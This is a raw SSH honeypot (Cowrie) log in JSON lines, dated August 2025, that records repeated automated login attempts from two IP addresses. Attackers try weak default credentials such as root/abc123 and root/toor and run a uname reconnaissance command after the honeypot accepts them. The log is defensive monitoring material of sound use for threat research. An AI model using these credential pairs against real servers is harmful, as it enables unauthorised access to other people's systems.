{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":57292,"dst_ip":"1.2.3.4","dst_port":22,"session":"561134eb74d8","protocol":"ssh","message":"New connection: 212.227.125.160:57292 (1.2.3.4:22) [session: 561134eb74d8]","sensor":"my-vps","timestamp":"2025-08-26T11:19:01.927392Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:19:01.928448Z","src_ip":"212.227.125.160","session":"561134eb74d8"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:19:02.000976Z","src_ip":"212.227.125.160","session":"561134eb74d8"}
{"eventid":"cowrie.login.success","username":"root","password":"abc123","message":"login attempt [root/abc123] succeeded","sensor":"my-vps","timestamp":"2025-08-26T11:19:03.667960Z","src_ip":"212.227.125.160","session":"561134eb74d8"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T11:19:04.507001Z","src_ip":"212.227.125.160","session":"561134eb74d8"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-26T11:19:04.507833Z","src_ip":"212.227.125.160","session":"561134eb74d8"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.4","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:19:04.877807Z","src_ip":"212.227.125.160","session":"561134eb74d8"}
{"eventid":"cowrie.session.closed","duration":"3.0","message":"Connection lost after 3.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:19:04.878972Z","src_ip":"212.227.125.160","session":"561134eb74d8"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":58078,"dst_ip":"1.2.3.4","dst_port":22,"session":"f574f0b474c3","protocol":"ssh","message":"New connection: 212.227.125.160:58078 (1.2.3.4:22) [session: f574f0b474c3]","sensor":"my-vps","timestamp":"2025-08-26T11:19:09.034374Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:19:09.035385Z","src_ip":"212.227.125.160","session":"f574f0b474c3"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:19:09.098838Z","src_ip":"212.227.125.160","session":"f574f0b474c3"}
{"eventid":"cowrie.login.failed","username":"isabakir","password":"isabakir","message":"login attempt [isabakir/isabakir] failed","sensor":"my-vps","timestamp":"2025-08-26T11:19:09.283988Z","src_ip":"212.227.125.160","session":"f574f0b474c3"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:19:10.383479Z","src_ip":"212.227.125.160","session":"f574f0b474c3"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":58856,"dst_ip":"1.2.3.4","dst_port":22,"session":"70f5224de17c","protocol":"ssh","message":"New connection: 212.227.125.160:58856 (1.2.3.4:22) [session: 70f5224de17c]","sensor":"my-vps","timestamp":"2025-08-26T11:19:14.863826Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:19:14.888902Z","src_ip":"212.227.125.160","session":"70f5224de17c"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:19:15.274509Z","src_ip":"212.227.125.160","session":"70f5224de17c"}
{"eventid":"cowrie.login.failed","username":"uftp","password":"uftp","message":"login attempt [uftp/uftp] failed","sensor":"my-vps","timestamp":"2025-08-26T11:19:16.046963Z","src_ip":"212.227.125.160","session":"70f5224de17c"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:19:17.343674Z","src_ip":"212.227.125.160","session":"70f5224de17c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":59626,"dst_ip":"1.2.3.4","dst_port":22,"session":"d9285670e36c","protocol":"ssh","message":"New connection: 212.227.125.160:59626 (1.2.3.4:22) [session: d9285670e36c]","sensor":"my-vps","timestamp":"2025-08-26T11:19:21.558788Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:19:21.564963Z","src_ip":"212.227.125.160","session":"d9285670e36c"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:19:22.248283Z","src_ip":"212.227.125.160","session":"d9285670e36c"}
{"eventid":"cowrie.login.failed","username":"registry","password":"registry","message":"login attempt [registry/registry] failed","sensor":"my-vps","timestamp":"2025-08-26T11:19:22.799708Z","src_ip":"212.227.125.160","session":"d9285670e36c"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:19:23.850407Z","src_ip":"212.227.125.160","session":"d9285670e36c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":60398,"dst_ip":"1.2.3.4","dst_port":22,"session":"4ccdc889fa4c","protocol":"ssh","message":"New connection: 212.227.125.160:60398 (1.2.3.4:22) [session: 4ccdc889fa4c]","sensor":"my-vps","timestamp":"2025-08-26T11:19:27.598858Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:19:27.603451Z","src_ip":"212.227.125.160","session":"4ccdc889fa4c"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:19:27.655989Z","src_ip":"212.227.125.160","session":"4ccdc889fa4c"}
{"eventid":"cowrie.login.failed","username":"hysteria","password":"hysteria","message":"login attempt [hysteria/hysteria] failed","sensor":"my-vps","timestamp":"2025-08-26T11:19:27.887274Z","src_ip":"212.227.125.160","session":"4ccdc889fa4c"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:19:29.022286Z","src_ip":"212.227.125.160","session":"4ccdc889fa4c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":32930,"dst_ip":"1.2.3.4","dst_port":22,"session":"f9ffc8e068f1","protocol":"ssh","message":"New connection: 212.227.125.160:32930 (1.2.3.4:22) [session: f9ffc8e068f1]","sensor":"my-vps","timestamp":"2025-08-26T11:19:33.860796Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:19:33.861929Z","src_ip":"212.227.125.160","session":"f9ffc8e068f1"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:19:33.917649Z","src_ip":"212.227.125.160","session":"f9ffc8e068f1"}
{"eventid":"cowrie.login.failed","username":"lscpd","password":"lscpd","message":"login attempt [lscpd/lscpd] failed","sensor":"my-vps","timestamp":"2025-08-26T11:19:34.087352Z","src_ip":"212.227.125.160","session":"f9ffc8e068f1"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:19:35.334205Z","src_ip":"212.227.125.160","session":"f9ffc8e068f1"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.86.249","src_port":60348,"dst_ip":"1.2.3.4","dst_port":22,"session":"f693da1f5130","protocol":"ssh","message":"New connection: 196.251.86.249:60348 (1.2.3.4:22) [session: f693da1f5130]","sensor":"my-vps","timestamp":"2025-08-26T11:19:36.718786Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:19:37.200049Z","src_ip":"196.251.86.249","session":"f693da1f5130"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-26T11:19:37.200778Z","src_ip":"196.251.86.249","session":"f693da1f5130"}
{"eventid":"cowrie.login.failed","username":"hadoop","password":"P@ssw0rd","message":"login attempt [hadoop/P@ssw0rd] failed","sensor":"my-vps","timestamp":"2025-08-26T11:19:38.911211Z","src_ip":"196.251.86.249","session":"f693da1f5130"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":33698,"dst_ip":"1.2.3.4","dst_port":22,"session":"77b5f232dd0f","protocol":"ssh","message":"New connection: 212.227.125.160:33698 (1.2.3.4:22) [session: 77b5f232dd0f]","sensor":"my-vps","timestamp":"2025-08-26T11:19:40.155501Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:19:40.166597Z","src_ip":"212.227.125.160","session":"77b5f232dd0f"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:19:40.206591Z","src_ip":"212.227.125.160","session":"77b5f232dd0f"}
{"eventid":"cowrie.login.failed","username":"oracle","password":"oracle123","message":"login attempt [oracle/oracle123] failed","sensor":"my-vps","timestamp":"2025-08-26T11:19:40.438803Z","src_ip":"212.227.125.160","session":"77b5f232dd0f"}
{"eventid":"cowrie.session.closed","duration":"4.6","message":"Connection lost after 4.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:19:41.323189Z","src_ip":"196.251.86.249","session":"f693da1f5130"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:19:41.814309Z","src_ip":"212.227.125.160","session":"77b5f232dd0f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":34472,"dst_ip":"1.2.3.4","dst_port":22,"session":"d0317ae94682","protocol":"ssh","message":"New connection: 212.227.125.160:34472 (1.2.3.4:22) [session: d0317ae94682]","sensor":"my-vps","timestamp":"2025-08-26T11:19:46.660907Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:19:46.661712Z","src_ip":"212.227.125.160","session":"d0317ae94682"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:19:46.712604Z","src_ip":"212.227.125.160","session":"d0317ae94682"}
{"eventid":"cowrie.login.success","username":"root","password":"toor","message":"login attempt [root/toor] succeeded","sensor":"my-vps","timestamp":"2025-08-26T11:19:46.864631Z","src_ip":"212.227.125.160","session":"d0317ae94682"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T11:19:47.039273Z","src_ip":"212.227.125.160","session":"d0317ae94682"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-26T11:19:47.039962Z","src_ip":"212.227.125.160","session":"d0317ae94682"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:19:47.091153Z","src_ip":"212.227.125.160","session":"d0317ae94682"}
{"eventid":"cowrie.session.closed","duration":"0.4","message":"Connection lost after 0.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:19:47.092245Z","src_ip":"212.227.125.160","session":"d0317ae94682"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":35242,"dst_ip":"1.2.3.4","dst_port":22,"session":"012720e22cd3","protocol":"ssh","message":"New connection: 212.227.125.160:35242 (1.2.3.4:22) [session: 012720e22cd3]","sensor":"my-vps","timestamp":"2025-08-26T11:19:52.632016Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:19:52.632948Z","src_ip":"212.227.125.160","session":"012720e22cd3"}
